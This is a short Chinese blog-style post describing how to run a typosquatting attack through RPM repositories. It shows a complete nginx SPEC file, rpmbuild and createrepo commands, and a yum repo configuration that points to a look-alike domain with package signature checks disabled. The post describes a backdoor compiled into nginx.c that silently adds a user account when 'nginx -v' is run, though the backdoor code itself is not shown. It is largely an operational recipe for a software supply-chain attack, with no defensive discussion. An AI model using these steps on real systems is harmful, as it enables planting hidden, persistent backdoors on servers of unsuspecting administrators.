关于一种古老的攻击

“误植域名”（Typosquatting）攻击

Typosquatting也被称为：URL劫持（URL hijacking），是一种域名抢注和品牌劫持形式，针对是在Web浏览器输入网址时出现拼写错误的网络用户（例如将baidu.com误打成“baidu.co”）。

之前npm和pypi也都出现过这种问题，今天来聊聊rpm的问题以及制作方法

在/usr/src/source/nginx-1.9.10/src/core/nginx.c 里增加一行very easy的代码

编写SPEC文件

#
# Example spec file for nginx
#
Summary: high performance web server
Name: nginx
Version: 1.9.10
Release: 1%{?dist}
License: GPL
Group: Applications/Server
Source0:        %{name}-%{version}.tar.gz
BuildRoot:      %_topdir/BUILDROOT
BuildRequires:  gcc,make
Requires:       pcre,pcre-devel,openssl

%description
nginx [engine x] is a HTTP and reverse proxy server, as well as
a mail proxy server

%prep
%setup -q


%build
./configure --prefix=/usr/local/nginx --with-pcre
make %{?_smp_mflags}

%install
rm -rf %{buildroot}
make install DESTDIR=%{buildroot}

%preun
if [ -z "`ps aux | grep nginx | grep -v grep`" ];then
killall nginx >/dev/null
exit 0
fi

%postun

%clean
rm -rf %{buildroot}


%files
%defattr (-,root,root)
/usr/local/nginx

开始编rpm包

rpmbuild -bb nginx.spec

mkdir -p /data/mirrors/centos/6/{os,updates}/x86_64/RPMS
mv /root/rpmbuild/RPMS/x86_64/nginx-1.9.10-1.el6.x86_64.rpm /data/mirrors/centos/6/updates/x86_64/RPMS/

createrepo /data/mirrors/centos/6/os/x86_64/
createrepo /data/mirrors/centos/6/updates/x86_64/

配置/etc/yum.repos.d下的mirror.repo文件

[base]

name=CentOS-$releasever - Base

baseurl=http://xxxx.co/data/mirrors/centos/$releasever/os/$basearch/

enabled=1

gpgcheck=0  //这里很多运维是会主动关闭检验rpm包的key


#released updates

[updates]

name=CentOS-$releasever - Updates

baseurl=http://xxxx.co/data/mirrors/centos/$releasever/updates/$basearch/

enabled=1

gpgcheck=0 //这里很多运维是会主动关闭检验rpm包的key

yum安装nginx

启动nginx，当执行/usr/local/nginx/sbin/nginx -v 查看nginx版本的时候，触发后门命令，添加一个用户

可能中招后很久都不会发现，只有当某一天执行命令查看nginx版本的时候才会悄无声息的触发后门